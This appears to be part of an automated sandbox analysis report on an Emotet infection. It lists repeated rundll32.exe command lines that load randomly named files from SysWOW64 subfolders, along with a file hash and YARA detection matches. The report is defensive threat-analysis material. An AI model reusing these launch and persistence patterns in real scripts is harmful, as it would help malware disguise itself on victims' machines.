                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2216468622.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2216501392.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2217285925.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:41
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2228390631.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2228409491.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2230214108.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:46
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2239275661.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2239237660.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2240182511.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:51
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2250563386.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2253405198.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2250329618.00000000006D0000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:41:56
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2260117902.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2261000236.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2260083486.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:01
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2272217705.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2272239255.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2275876666.0000000010000000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:07
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2282637087.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2283433880.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2282670574.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:11
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2293149466.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2294420728.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2293169935.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:16
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2305216199.0000000000130000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2305247507.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2306105928.0000000010000000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:22
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2315698763.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2315683097.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2318576557.0000000010000000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:27
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2328304138.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2326497204.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2326554651.0000000000300000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:32
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2343132705.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2345794337.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2343180402.0000000000190000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:37
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2351060980.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2351041899.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2351778015.0000000010000000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:43
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Disassembly

                                        Code Analysis

                                        Reset < >